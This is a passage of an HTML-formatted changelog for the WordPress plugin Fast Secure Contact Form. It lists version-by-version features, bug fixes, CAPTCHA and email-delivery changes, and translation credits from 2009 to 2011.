fields</li>\n<li>Added optional form \"reset\" button.</li>\n<li>Fixed escaped comma bug in Restore Tool</li>\n</ul>\n\n<h4>2.9.8.4</h4>\n\n<ul>\n<li>(23 Feb 2011) - Fixed broken \"fields to ignore\" feature. </li>\n<li>File attach type and size labels can be changed.</li>\n</ul>\n\n<h4>2.9.8.3</h4>\n\n<ul>\n<li>(14 Feb 2011) - Improvement: javascript is only loaded on pages when it is conditionally needed.</li>\n<li>Fixed 2 label alignment problems with some themes.</li>\n<li>Fixed possible javascript conflict that can break the redirect feature.</li>\n<li>Fixed extra fields were not accepting zero.</li>\n<li>More name labels can be changed.</li>\n<li>Added new feature: Copy Settings Tool. This tool can copy your contact form settings from one form number to any of your other forms. Use to copy just the style settings, or all the settings from one form.</li>\n<li>Added more shortcode optional settings <a href=\"http://www.fastsecurecontactform.com/shortcode-options\">see FAQ page</a> </li>\n<li>Added hidden field can accept query input. <a href=\"http://www.fastsecurecontactform.com/query-string-parameters\">see FAQ page</a></li>\n<li>Other fixes and enhancements</li>\n</ul>\n\n<h4>2.9.8.2</h4>\n\n<ul>\n<li>(07 Feb 2011) - Fix critical error \"invalid argument supplied foreach () /si-contact-form.php on line 474\". Sorry for the inconvenience.</li>\n<li>Fix \"Enable data export after the message\" setting would not uncheck.</li>\n<li>Changed default setting: If you use Contact Form 7 to DB Extension Plugin, be sure to visit the form edit page and enable this setting: \"Enable data export after the message\", because it is not enabled by default.</li>\n</ul>\n\n<h4>2.9.8.1</h4>\n\n<ul>\n<li>(07 Feb 2011) - Added Silent Send feature: Use to send the posted data to another form or 3rd party API <a href=\"http://www.fastsecurecontactform.com/send-form-data-elsewhere\">See FAQ</a></li>\n<li>Fixed blank from email when email address was set to \"not available\".</li>\n<li>Added features: Now you can add tags to print posted data for the email subject, autoresponder subject, or the autoresponder message.\nTo see instructions, just click \"help\" next to any of these fields on the form edit page. <a href=\"http://www.fastsecurecontactform.com/tip-add-email-autoresponder\">See FAQ</a></li>\n<li>Added feature: Data Export settings to manage what fields are allowed to be exported or ignored for each form. Also email can be disabled when exporting data.</li>\n</ul>\n\n<h4>2.9.8</h4>\n\n<ul>\n<li>(29 Jan 2011) - Added setting: \"Enable to receive email as HTML instead of plain text.\" Enable if you want the email message sent as HTML format. HTML format is desired if you want to avoid a 70 character line wordwrap when you copy and paste the email message. Normally the email is sent in plain text wordwrapped 70 characters per line to comply with most email programs. </li>\n<li>Added new settings in the \"Redirect\" section: You can Enable posted data to be sent as a query string on the redirect URL. This can be used to send the posted data via GET query string to a another form. </li>\n<li>New settings for redirect: \"Query string fields to ignore\", \"Query string fields to rename\", and \"Disable email sending (use only when required while you have enabled query string on the redirect URL)\". <a href=\"http://www.fastsecurecontactform.com/sending-data-by-query-string\">See FAQ</a></li>\n<li>Added version indicator and new version reminder to settings page.</li>\n<li>Fixed a multiple email problem if using the same form in several posts. Anyway, it is recommended to use the form in a page or sidebar, not a post.</li>\n<li>Fixed bug where form number was reset to 4 after trying to increase over 99.</li>\n<li>Fixed so now one CAPTCHA random position always has to be a number so that a 4 letter swear word could never appear.</li>\n<li>Many small fixes and enhancements. </li>\n<li>Added Romanian (ro_RO) - Translated by <a href=\"http://www.jibo.ro\">Anunturi Jibo</a></li>\n</ul>\n\n<h4>2.9.7.1</h4>\n\n<ul>\n<li>(19 Jan 2011) - Added ability to pre-fill in form fields from a URL query string. <a href=\"http://www.fastsecurecontactform.com/query-string-parameters\">see FAQ page</a></li>\n<li>Select Single posted data fix.</li>\n</ul>\n\n<h4>2.9.7</h4>\n\n<ul>\n<li>(13 Jan 2011) - Added a new hook for other plugins to use (just after mail sent). This can be used to export the posted data and attachments to a database. A plugin for this is in the works, stay tuned.</li>\n<li>Added new Select-multiple extra field type.</li>\n<li>Added new feature to set the css style for Label and Field in the same row, or switch back to Label on Top <a href=\"http://www.fastsecurecontactform.com/form-labels-left\">see FAQ</a></li>\n<li>Added new Setting for \"Form Label\". You can enter a label for your form to keep track of what you are using it for.</li>\n<li>Fixes and improvements for better mail delivery and to reduce the emails from going to the spam folder.\nIf you are not getting email, set the setting \"E-mail From\" to an email address on the same domain as your web site. This will improve mail delivery.\n<a href=\"http://www.fastsecurecontactform.com/email-does-not-send\">mail problem faq</a>.</li>\n<li>Added new setting: \"Enable when web host requires \"Mail From\" strictly tied to domain email account\". If your form does not send any email, then set the \"E-mail From\" setting to an address on the same web domain as your web site. If email still does not send, also check this setting. (ie: some users report this is required by yahoo small business web hosting) .</li>\n<li>Added ability to use comma in extra field labels for Checkbox, Radio, Select, or Select-multiple. If you need to use a comma besides the one needed to separate the label, escape it with a back slash, like this: \\,</li>\n<li>Improved Akismet spam check API code.</li>\n<li>Fixed required option for checkbox multiple, now all field types can be required as needed. </li>\n<li>Fixed all fields with multiple options can have a default option: checkbox, radio, select, or select-multiple.</li>\n<li>Other small Fixes and improvements. </li>\n<li>Updated Italian (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n</ul>\n\n<h4>2.9.6</h4>\n\n<ul>\n<li>(29 Dec 2010) - Removed advanced options link. Too many people could not find it. All options are now always available on the form edit page.</li>\n<li>Added new setting for \"Autoresponder E-mail \"From\" address:\" </li>\n</ul>\n\n<h4>2.9.5.4</h4>\n\n<ul>\n<li>(17 Dec 2010) - Advanced Options are now open by default for new installs.</li>\n<li>Some changes to admin settings page.</li>\n</ul>\n\n<h4>2.9.5.3</h4>\n\n<ul>\n<li>(14 Dec 2010) - Added Geolocation for the email footer. Install my Visitor Maps plugin and the sender\'s city, state, country will automatically be included in the email footer. </li>\n<li>Rename CAPTCHA font files all lower case to avoid a rare FTP problem.</li>\n</ul>\n\n<h4>2.9.5.2</h4>\n\n<ul>\n<li>(30 Nov 2010) - Fix - last update included an old file causing the new \'hidden\' and \'password\' fields not to show up on form.</li>\n</ul>\n\n<h4>2.9.5.1</h4>\n\n<ul>\n<li>(19 Nov 2010) - Added extra field types for \'hidden\' and \'password\' entry.</li>\n<li>Added option to preserve white space on Message field. Normally the Message field will have all extra white space removed. Enabling this setting will allow all the Message field white space to be preserved.</li>\n<li>Updated Farsi(Persian)(fa_IR) partial translation - Translated by Ramin Firooz</li>\n</ul>\n\n<h4>2.9.5</h4>\n\n<ul>\n<li>(05 Nov 2010) - Added extra field type for \'time\' entry.</li>\n<li>Small code improvements for CAPTCHA function.</li>\n<li>Added Farsi(Persian)(fa) partial translation - Translated by Ramin Firooz</li>\n</ul>\n\n<h4>2.9.4.1</h4>\n\n<ul>\n<li>(27 Oct 2010) - Fix Backup Settings tool download hang on Firefox.</li>\n<li>Added Japanese (ja) - Translated by [Ichiro Kozuka]</li>\n</ul>\n\n<h4>2.9.4</h4>\n\n<ul>\n<li>(11 Oct 2010) - Added new option for what should happen if Akismet determines the message is spam. If you select \"block spam messages\". If Akismet determines the message is spam: An error will display \"Invalid Input - Spam?\" and the form will not send. If you select \"tag as spam and send anyway\". If Akismet determines the message is spam: The message will send and the subject will begin with \"Akismet: Spam\". This way you can have Akismet on and be sure not to miss a message.</li>\n<li>Added more years to the extra date field date selector (1930-2037).</li>\n<li>Fixed order of extra field options on admin settings page.</li>\n<li>Added Arabic (ar) - Translated by [Mouad] translated only the public side of the form</li>\n<li>Updated Russian (ru_RU) - Translated by [Petr Perstnev]</li>\n<li>Updated Italian (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n</ul>\n\n<h4>2.9.3</h4>\n\n<ul>\n<li>(20 Sep 2010) - Added new setting so Akismet can now be set to off for the forms. The new setting is individual to each form.</li>\n<li>Added new email footer message for \"Akismet Spam Check: passed\".</li>\n<li>Added more date format types for the calendar date setting.</li>\n</ul>\n\n<h4>2.9.2</h4>\n\n<ul>\n<li>(05 Sep 2010) - Fixed bug that caused form radio or select default to always be 0.</li>\n<li>Fixed form action URL posted to wrong page when form is in a sidebar widget.</li>\n<li>New transparent audio and refresh images for the CAPTCHA, will look better on dark themes.</li>\n<li>Updated Danish (da_DK) - Translated by <a href=\"http://wordpress.blogos.dk/wpdadkdownloads/\">GeorgWP</a></li>\n<li>Updated Italian (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n<li>Updated French (fr_FR) - Translated by <a href=\"http://Rhialto.com/\">Daniel</a></li>\n</ul>\n\n<h4>2.9.1</h4>\n\n<ul>\n<li>(28 Aug 2010) - Fixed critical HTML errors on admin settings page.</li>\n<li>Improved autoresponder settings (now in new fieldset) on admin settings page.</li>\n<li>Added new setting: \"Enable using HTML in autoresponder E-mail message\".</li>\n<li>Added new setting: \"Advanced Options - Stay Open\" to make the Advance Options always stay open.</li>\n</ul>\n\n<h4>2.9</h4>\n\n<ul>\n<li>(23 Aug 2010) - New style for admin settings page.</li>\n<li>New preview form feature for admin settings page. <a href=\"http://www.fastsecurecontactform.com/tip-form-preview\">more about preview mode</a></li>\n<li>Added automatic SSL support for the CAPTCHA URL.</li>\n<li>Added download count and star rating on admin options page. </li>\n<li>Improved error messages when detecting possible email injection attempts.</li>\n<li><a href=\"http://www.fastsecurecontactform.com/faq-wordpress-version\">New official FAQ at FastSecureContactForm.com</a></li>\n</ul>\n\n<h4>2.8.3</h4>\n\n<ul>\n<li>(15 Aug 2010) - New homepage: <a href=\"http://www.FastSecureContactForm.com/\" rel=\"nofollow\">http://www.FastSecureContactForm.com/</a></li>\n<li>Added attachment directory permissions check.</li>\n<li>Fixed error when increasing number of fields.</li>\n<li>Renamed plugin to \"Fast Secure Contact Form\"</li>\n<li>Added rel=\"nofollow\" tag to CAPTCHA Audio and Refresh links for better SEO.</li>\n<li>Removed CAPTCHA WAV sound files, mp3 ones smaller size.</li>\n<li>Updated Dutch</li>\n<li>Updated Italian</li>\n</ul>\n\n<h4>2.8.2</h4>\n\n<ul>\n<li>(07 Aug 2010) - More improvements to the CAPTCHA test page. </li>\n<li>Added captcha-temp directory permission check to alert the admin if there is a problem. This check is on the admin settings page, the captcha test page, and when posting the captcha.</li>\n</ul>\n\n<h4>2.8.1</h4>\n\n<ul>\n<li>(01 Aug 2010) - PHP Sessions are no longer required for the CAPTCHA. The new method uses temporary files to store the CAPTCHA codes until validation. PHP sessions can still be reactivated by unchecking the setting: \"Use CAPTCHA without PHP session\".</li>\n<li>Added Akismet spam prevention status to the contact form settings page, so you can know if Akismet is protecting or not.</li>\n<li>Added more help notes to the admin settings page.</li>\n<li>Fixed extra forms were not deleted when when decreasing the number of available forms.</li>\n<li>Fixed to redirect to Form 1 when changing the number of available forms.</li>\n<li>Improved the CAPTCHA Test Page.</li>\n</ul>\n\n<h4>2.8</h4>\n\n<ul>\n<li>(25 Jul 2010) - Added much requested Backup/restore tool. You can backup/restore all your forms or single forms and settings using a tool at the bottom of the settings page.</li>\n<li>Added new settings: \'Autoresponder E-mail From name\', and \'Autoresponder E-mail \"Reply To\" address\'.</li>\n<li>Added ability to set subject by URL GET method: ?si_contact_subject=I would like to adopt Freddy.</li>\n<li>Fixed email \"Reply to\" header to be from sender when appropriate so that replying to the email goes back to sender.</li>\n<li>More improvements to email sending and testing functions.</li>\n<li>Improved fieldset feature. Renamed fieldset(group) to fieldset(box-open) and added fieldset(box-close). </li>\n<li>Minor improvements to display.</li>\n<li>Updated German</li>\n</ul>\n\n<h4>2.7.4</h4>\n\n<ul>\n<li>(19 Jul 2010) - Fixed blank subject when using optional email subject list.</li>\n<li>Fixed AutoResponder is from person filling the form instead of from WordPress admin.</li>\n<li>Fixed email delivery for some servers that require 5th parameter -f to PHP mail function.</li>\n<li>Updated FAQ page for better help when mail is not sending: <a href=\"http://wordpress.org/extend/plugins/si-contact-form/faq/\" rel=\"nofollow\">http://wordpress.org/extend/plugins/si-contact-form/faq/</a></li>\n<li>Improved the E-mail test feature at the bottom of the settings page, use to troubleshooting mail delivery problems.</li>\n<li>Added option to use geekMail library for sending mail, try when having mail delivery problems.</li>\n<li>Added more style settings.</li>\n<li>Other small improvements.</li>\n</ul>\n\n<h4>2.7.3</h4>\n\n<ul>\n<li>(12 Jul 2010) - Critical fix for broken checkbox feature in IE8 caused by version 2.7.2</li>\n<li>Added more date format types for the date extra field.</li>\n</ul>\n\n<h4>2.7.2</h4>\n\n<ul>\n<li>(11 Jul 2010) - Added \"Name field format:\" so you can select how the name field is formatted on the form. Name, First Name, Last Name, etc. </li>\n<li>Added autoresponder E-mail message feature. Enable when you want the form to automatically answer with an autoresponder E-mail message.</li>\n<li>Added Optional notes/help for extra form fields. Use the optional notes/help to print some notes or instructions before a form field. This is for the form display only, not E-mail. HTML is allowed. </li>\n<li>Fixed \"Attachment upload failed\" message when attachment is not set to required.</li>\n<li>Improved email newline handling(some windows servers are really picky).</li>\n<li>Improved CAPTCHA image alignment and other minor fixes.</li>\n<li>Updated Danish (da_DK) - Translated by <a href=\"http://wordpress.blogos.dk/wpdadkdownloads/\">GeorgWP</a></li>\n<li>Updated Italian (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n<li>Updated German (de_DE) - Translated by [Rico]</li>\n</ul>\n\n<h4>2.7.1</h4>\n\n<ul>\n<li>(04 Jul 2010) - Added fieldset(group) feature to extra fields. The fieldset is used to draw a box around related form elements.</li>\n<li>Added more language strings to date field.</li>\n<li>Added setting: \"Date field - Calendar Start Day of the Week:\"</li>\n<li>Added new setting: \"Move extra fields to after the Message field.\"</li>\n<li>Fixed rare problem on some servers, CAPTCHA image had missing letters.</li>\n</ul>\n\n<h4>2.7</h4>\n\n<ul>\n<li>(27 Jun 2010) - Added file attachment feature, see here for details: <a href=\"http://wordpress.org/support/topic/416371\" rel=\"nofollow\">http://wordpress.org/support/topic/416371</a></li>\n<li>Added setting: \"Enable users to send HTML code in the textarea extra field types.\"(off by default).</li>\n<li>Added setting: \"Enable sender information in E-mail footer.\"(on by default).</li>\n<li>Added HTML anchor tags to bring focus to the form when used on a page with lots of content before the form. </li>\n</ul>\n\n<h4>2.6.5</h4>\n\n<ul>\n<li>(23 Jun 2010) - CSS fix form field margins were too big on Twenty Ten Theme in WP 3.0</li>\n<li>Single checkbox can have a comma in the label(as long is there is no semicolon because then it becomes a multi-checkbox).</li>\n</ul>\n\n<h4>2.6.4</h4>\n\n<ul>\n<li>(11 Jun 2010) - Added ability to set both a name and email on the \"E-mail From (optional):\" field .You can enter just an email: <a href=\"mailto:user1@example.com\">user1@example.com</a>\nOr enter name and email: webmaster,user1@example.com </li>\n<li>Fixed missing shortcode example on admin page.</li>\n<li>Fixed so subject prefix can be blank.</li>\n<li>Added more field indicator options in Advanced Options - Fields</li>\n<li>Added Finnish (fi) - Translated by <a href=\"http://www.guimikko.com/\">Mikko Vahatalo</a> </li>\n<li>Updated Italian (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n</ul>\n\n<h4>2.6.3</h4>\n\n<ul>\n<li>(30 May 2010) - Added setting to switch from wordpress mail function to PHP mail function. This setting can resolve some rare mail delivery problems.</li>\n<li>Fixed so checkboxes can have default selected.</li>\n<li>Fixed HTML5 compatible(with CAPTCHA flash audio off).</li>\n<li>Fixed required indicator now has proper class <code><span class=\"required\">*</span></code>. </li>\n<li>Fixed syntax bug on extra \'date\' fields.</li>\n<li>Fixed for Simple Facebook Connect compatibility (fixes broken CAPTCHA caused by SFC Like and Share plugins).</li>\n</ul>\n\n<h4>2.6.2</h4>\n\n<ul>\n<li>(21 May 2010) - Fixed major bug: All text and textarea extra fields were missing from email. Sorry for the inconvenience. There are so many who use it, I updated it right away.</li>\n</ul>\n\n<h4>2.6.1</h4>\n\n<ul>\n<li>(19 May 2010) - Fixed bug: all checkboxes appeared selected in the email. </li>\n<li>Fixed to allow HTML in extra field labels.</li>\n</ul>\n\n<h4>2.6</h4>\n\n<ul>\n<li>(19 May 2010) - Fix for XHTML Strict compliance.</li>\n<li>Improved CAPTCHA CSS code (better alignment captcha, refresh, and audio images).</li>\n<li>Added advanced options for date format on extra \'date\' fields (mm/dd/yyyy, dd/mm/yyyy).</li>\n<li>Added advanced options to set checkboxes with children (Pizza Toppings:,olives;mushrooms;cheese;ham;tomatoes).</li>\n<li>Added advanced options to set a default selected item for select and radio fields.</li>\n<li>Added advanced options to make name, email, subject, or message fields (not_available, not_required, or required).\nthis feature can be used to make an anonymous comment form. Also can be used to disable name and email to make them reordered when using extra fields.</li>\n<li>Updated Spanish (es_ES) - Translated by Sergio Torres.</li>\n</ul>\n\n<h4>2.5.6</h4>\n\n<ul>\n<li>(15 May 2010) - Made WP3 Compatible.</li>\n</ul>\n\n<h4>2.5.5</h4>\n\n<ul>\n<li>(07 May 2010) - Fixed to be compatible with *www.com domain name.</li>\n<li>Added extra field type for \"date\", this new field can be used for a hotel registration form and uses a popup \"Epoch DHTML Calendar\" 1.06 by Nick Baicoianu from meanfreepath.com</li>\n</ul>\n\n<h4>2.5.4</h4>\n\n<ul>\n<li>(01 May 2010) - Fixed small issue with \"enable hidden message\" option.</li>\n<li>Fixed small issue with \"email from\" option.</li>\n<li>Improved CAPTCHA testpage.</li>\n</ul>\n\n<h4>2.5.3</h4>\n\n<ul>\n<li>(23 Apr 2010) - Added Dutch (nl_NL) - Translated by [Mark Visser]</li>\n<li>Added Swedish (sv_SE) - Translated by <a href=\"http://walktheline.boplatsen.se/\">Daniel Persson</a></li>\n</ul>\n\n<h4>2.5.2</h4>\n\n<ul>\n<li>(16 Apr 2010) - Added Hungarian (hu_HU) - Translated by <a href=\"http://dmgmedia.hu\">Jozsef Burgyan</a></li>\n<li>Updated Polish (pl_PL) - Translated by [Pawel Mezyk]</li>\n</ul>\n\n<h4>2.5.1</h4>\n\n<ul>\n<li>(09 Apr 2010) - Fixed bug in reset styles feature.</li>\n<li>Updated Italian (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n</ul>\n\n<h4>2.5.0</h4>\n\n<ul>\n<li>(05 Apr 2010) - Added setting to add optional drop down list for email subject.</li>\n<li>Added setting to make the CAPTCHA image smaller.</li>\n<li>Added settings to increase number of forms and have more extra fields (editing code is no longer needed).</li>\n<li>Fixed so multiple forms can be on the same page. </li>\n<li>Added editable text label setting for (* denotes required field).</li>\n<li>Added more style settings in Advanced Options. You can use inline css, or add a class property to be used by your own stylsheet.\nAcceptable Examples:\ntext-align:left; color:#000000; background-color:#CCCCCC;\nstyle=\"text-align:left; color:#000000; background-color:#CCCCCC;\"\nclass=\"input\"</li>\n<li>Split code into 4 smaller files for better performance.</li>\n<li>Other bug fixes.</li>\n</ul>\n\n<h4>2.0.2</h4>\n\n<ul>\n<li>(16 Mar 2010) - Added radio and select configuration error checking. Fix display of radio input fields to be on separate lines.</li>\n<li>Fixed multiple BCC feature, it was only accepting one BCC.</li>\n<li>Updated German (de_DE) and Bulgarian (bg_BG)</li>\n</ul>\n\n<h4>2.0.1</h4>\n\n<ul>\n<li>(06 Feb 2010) - Fix Invalid Input error when the word \"donkey\" is in the input string.</li>\n<li>Added Polish (pl_PL) - Translated by [Pawel Mezyk]</li>\n<li>Fixed Greek language file name.</li>\n</ul>\n\n<h4>2.0</h4>\n\n<ul>\n<li>(26 Jan 2010) - Added required field indicators (can be disabled in settings if you do not like them).</li>\n<li>Added setting to adjust redirect delay seconds(range of 1-5 recommended).</li>\n<li>Added setting to hide message entry, now you can hide subject and message fields for use as a newsletter signup.</li>\n<li>Added selectable extra field types: text, textarea, checkbox, radio, select. Note: When using select or radio field types, first enter the label and a comma. Next include the options separating with a semicolon like this example: Color:,Red;Green;Blue </li>\n</ul>\n\n<h4>1.9.6</h4>\n\n<ul>\n<li>(31 Dec 2009) - New setting for a few people who had problems with the text transparency \"Disable CAPTCHA transparent text (only if captcha text is missing on the image, try this)\".</li>\n<li>Added Hebrew, Israel (he_IL) - Translated by <a href=\"http://web.freeall.org\">Asaf Chertkoff FreeAllWeb GUILD</a> </li>\n</ul>\n\n<h4>1.9.5</h4>\n\n<ul>\n<li>(04 Dec 2009) - Fix slashes issue on some servers.</li>\n<li>More improvements for CAPTCHA images and fonts.</li>\n</ul>\n\n<h4>1.9.4</h4>\n\n<ul>\n<li>(30 Nov 2009) - Fix blank CAPTCHA text issue some users were having.</li>\n<li>Added CAPTCHA difficulty level setting on the settings page (Low, Medium, Or High).</li>\n<li>Added Portuguese (pt_PT) - Translated by <a href=\"http://pws.op351.net/\">AJBFerreira Blog</a></li>\n</ul>\n\n<h4>1.9.3</h4>\n\n<ul>\n<li>(23 Nov 2009) - Fix completely broke CAPTCHA, sorry about that</li>\n</ul>\n\n<h4>1.9.2</h4>\n\n<ul>\n<li>(23 Nov 2009) - Added 5 random CAPTCHA fonts.</li>\n<li>Added feature to increase the number of extra form fields available (see faq if you need it).</li>\n<li>Fixed fail over to GD Fonts on the CAPTCHA when TTF Fonts are not enabled in PHP (it was broken).</li>\n</ul>\n\n<h4>1.9.1</h4>\n\n<ul>\n<li>(21 Nov 2009) - Fixed Flash audio was not working.</li>\n<li>Added Spanish (es_ES) - Translated by <a href=\"http://www.activosenred.com/\">Valentin Yonte Rodriguez</a></li>\n</ul>\n\n<h4>1.9</h4>\n\n<ul>\n<li>(20 Nov 2009) - Updated to SecureImage CAPTCHA library version 2.0</li>\n<li>New CAPTCHA features include: increased CAPTCHA difficulty using mathematical distortion, streaming MP3 audio of CAPTCHA code using Flash, random audio distortion, better distortion lines, random backgrounds and more.</li>\n<li>Other minor fixes.</li>\n</ul>\n\n<h4>1.8.4</h4>\n\n<ul>\n<li>(10 Nov 2009) - Added advanced option to edit the CAPTCHA input field size.</li>\n<li>Other minor fixes.</li>\n</ul>\n\n<h4>1.8.3</h4>\n\n<ul>\n<li>(09 Nov 2009) - Fix Submit button spacing.</li>\n</ul>\n\n<h4>1.8.2</h4>\n\n<ul>\n<li>(03 Nov 2009) - Added feature to increase the number of forms available (see faq if you need it).</li>\n<li>Fix for settings not being deleted when plugin is deleted from admin page.</li>\n<li>Updated Italian (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n<li>Added Albanian (sq_AL) - Translated by <a href=\"http://www.romeolab.com\">Romeo Shuka</a></li>\n</ul>\n\n<h4>1.8.1</h4>\n\n<ul>\n<li>(02 Nov 2009) - Fixed error \"Could not read CAPTCHA cookie\" on some installs using version 1.8</li>\n</ul>\n\n<h4>1.8</h4>\n\n<ul>\n<li>(02 Nov 2009) - Added Multi-Form feature that allows you to have up to four different forms on your site.</li>\n<li>Added Bulgarian (bg_BG) - Translated by <a href=\"http://chereshka.net/\">Dimitar Atanasov</a></li>\n</ul>\n\n<h4>1.7.7</h4>\n\n<ul>\n<li>(30 Oct 2009) - Fixed issue on some sites with blank css fields that caused image misalignment.</li>\n<li>Added advanced option to edit the CSS style for border on the contact form.</li>\n</ul>\n\n<h4>1.7.6</h4>\n\n<ul>\n<li>(27 Oct 2009) - Added advanced option to edit the CSS style for contact drop down select on the contact form.</li>\n<li>HTML validation fix.</li>\n</ul>\n\n<h4>1.7.5</h4>\n\n<ul>\n<li>(21 Oct 2009) - Added Chinese (zh_CN) - Translated by <a href=\"http://www.awuit.cn/\">Awu</a> </li>\n<li>Added Greek (el) - Translated by <a href=\"http://www.jbaron.gr/\">Ioannis</a></li>\n</ul>\n\n<h4>1.7.4</h4>\n\n<ul>\n<li>(03 Oct 2009) - Fixed advanced setting: CSS style for form input fields. Changing background color did not work.</li>\n<li>Added setting to Enable hidden E-mail subject (removes subject field from contact form). </li>\n</ul>\n\n<h4>1.7.3</h4>\n\n<ul>\n<li>(01 Oct 2009) - Updated links to my other plugins.</li>\n<li>Danish (da_DK) - Updated by <a href=\"http://wordpress.blogos.dk\">Georg / Team Blogos</a></li>\n</ul>\n\n<h4>1.7.2</h4>\n\n<ul>\n<li>(30 Sep 2009) - Fixed settings were deleted at deactivation. Settings are now only deleted at uninstall.</li>\n</ul>\n\n<h4>1.7.1</h4>\n\n<ul>\n<li>(29 Sep 2009) - Fix credit link position. </li>\n<li>Some people wanted to change the error messages for the contact form. Advanced settings fields can be filled in to override the standard included error messages.</li>\n</ul>\n\n<h4>1.7</h4>\n\n<ul>\n<li>(28 Sep 2009) - Added 8 optional extra fields. Some people requested extra contact form fields that could be used for phone number, company name, etc. To enable an extra field from the advanced options, just enter a label. Then check if you want the field to be required or not.</li>\n</ul>\n\n<h4>1.6.8</h4>\n\n<ul>\n<li>(22 Sep 2009) - Fix, some sites reported a image path problem. (I think it is correct now). </li>\n</ul>\n\n<h4>1.6.7</h4>\n\n<ul>\n<li>(22 Sep 2009) - Fix, some sites reported a path problem with \"Blog address\" is different domain than \"WordPress address\".</li>\n<li>Added setting to enable upper case alphabet correction. </li>\n<li>Added more fields in \"advanced options\".</li>\n<li>Minor code cleanup.</li>\n</ul>\n\n<h4>1.6.6</h4>\n\n<ul>\n<li>(21 Sep 2009) - Fix \"Invalid Input\" error on installations where \"Blog address\" is different domain than \"WordPress address\".</li>\n<li>More sanity checks on Form DIV Width setting.</li>\n<li>Added ability to use dashes or underscores in shortcode: <code>[si-contact-form]</code> or <code>[si_contact_form]</code>.</li>\n</ul>\n\n<h4>1.6.5</h4>\n\n<ul>\n<li>(18 Sep 2009) - Added proper nonce protection to options forms. </li>\n<li>Added option to reset the styles to defaults (incase you tried to adjust them and did not like the results).</li>\n<li>Fixed typo in file name for Portuguese - Brazil language (pt_BR).</li>\n<li>Fixed several language files [BR, FR, NO, DE...] had word \"Submit\" spelled as \"submit\".</li>\n</ul>\n\n<h4>1.6.4</h4>\n\n<ul>\n<li>(14 Sep 2009) - Added E-mail test feature in options, if you are not receiving mail, try it. It will display troubleshooting information.</li>\n<li>Added error check for wp_mail send, this is helful to troubleshoot mail delivery. </li>\n<li>Added a warning message on Options page for when the web host has mail() function disabled.</li>\n</ul>\n\n<h4>1.6.3</h4>\n\n<ul>\n<li>(13 Sep 2009) - Added new advanced options for CSS style of captcha image, audio image, reload image, and submit button.</li>\n<li>Fixed coding for XHTML Strict validation.</li>\n<li>Added Ukrainian language (uk_UA) - Translated by <a href=\"http://wordpress.ua/\">Wordpress.Ua</a></li>\n</ul>\n\n<h4>1.6.2</h4>\n\n<ul>\n<li>(11 Sep 2009) - Added new feature in options: \"Enable checking DNS records for the domain name when checking for a\nvalid E-mail address.\" It looks for any of the following: A record, a CNAME record, or MX record.(enabled by default).</li>\n<li>Updated FAQ</li>\n</ul>\n\n<h4>1.6.1</h4>\n\n<ul>\n<li>(11 Sep 2009) - Fixes error if you are upgrading from prior version: Fatal error: Call to a member function <code>si_contact_migrate()</code> on a non-object in si-contact-form.php on line 1461</li>\n<li>If you get this error and cannot access your WP site: the manual fix is to delete the <code>si-contact-form.php</code> file from the <code>plugins/si-contact-form/</code> directory, your site will start working again. Then you can install this new version.<br />\nSee this <a href=\"http://wordpress.org/support/topic/309925\">forum post</a></li>\n</ul>\n\n<h4>1.6</h4>\n\n<ul>\n<li>(10 Sep 2009) - Auto form fill is automatically skipped for any user with administrator role.</li>\n<li>New option: Auto form fill can be enabled/disabled in advanced options(enabled by default).</li>\n<li>Plugin options are now stored in a single database row instead of many. (it will auto migrate/cleanup old database rows).</li>\n<li>Language files are now stored in the <code>si-contact-form/languages</code> folder.</li>\n<li>Options are deleted when this plugin is deleted.</li>\n<li>Added help links on options page.</li>\n<li>Added Portuguese Brazil (pt_BR) - Translated by [Rui Alao]</li>\n<li>Updated Russian (ru_RU) - Translated by <a href=\"http://www.sprestij.ru/\">Bezraznizi</a></li>\n<li>Updated Turkish (tr_TR) - Translated by <a href=\"http://www.tapcalap.com/\">Tolga</a></li>\n</ul>\n\n<h4>1.5</h4>\n\n<ul>\n<li>(9 Sep 2009) - New feature: I added an \"advanced options\" section to the options page. Some people wanted to change the text labels for the contact form.\nThese advanced options fields can be filled in to override the standard included field titles.</li>\n<li>Other minor code changes.</li>\n</ul>\n\n<h4>1.4.4</h4>\n\n<ul>\n<li>(08 Sep 2009) - Fixed possible error: \"mail could not be sent because host may have disabled email function()\"</li>\n</ul>\n\n<h4>1.4.3</h4>\n\n<ul>\n<li>(08 Sep 2009) - Fixed redirect/logout problem on admin menu reported by a user.</li>\n<li>Removed blog name from top of email message body.</li>\n</ul>\n\n<h4>1.4.2</h4>\n\n<ul>\n<li>(07 Sep 2009) - Added configurable email subject prefix in options.</li>\n<li>Added configurable border width in options.</li>\n<li>Auto form fill is now disabled for admin, but still works for other logged in users.</li>\n<li>Other minor fixes.</li>\n</ul>\n\n<h4>1.4.1</h4>\n\n<ul>\n<li>(06 Sep 2009) - Added feature: Auto form fill email address and name (username) on the contact form for logged in users.</li>\n<li>Added feature: prints \"From a WordPress user: <code><username></code>\" on email footer for logged in users.</li>\n<li>Added feature: Date/Time timestamp on email footer (uses Date/Time format from general options setting).</li>\n<li>Added Russian Language (ru_RU) - Translated by <a href=\"http://www.sprestij.ru/\">Bezraznizi</a></li>\n</ul>\n\n<h4>1.4</h4>\n\n<ul>\n<li>(06 Sep 2009) Now uses wp_mail function so that users who use the SMTP mail plugins will be supported.</li>\n<li>Now sends email encoded in the character encoding you write your blog in, (UTF-8 is recommended) see <code>Settings</code>, <code>Reading</code> admin options page.</li>\n<li>New feature: Now you can have multiple E-mails per contact, this is called a CC(Carbon Copy). If you need to add more than one contact, see the example: click \"help\" on the <code>Contact Form Options Page</code>. </li>\n<li>Fixed error \"Bad parameters to mail() function\" reported by a couple users.</li>\n<li>Fixed error \"Call to undefined function <code>mb_detect_encoding()</code>\" reported by one user.</li>\n<li>Many hours were put into this free plugin. Please donate, even small amounts like $2.99 are 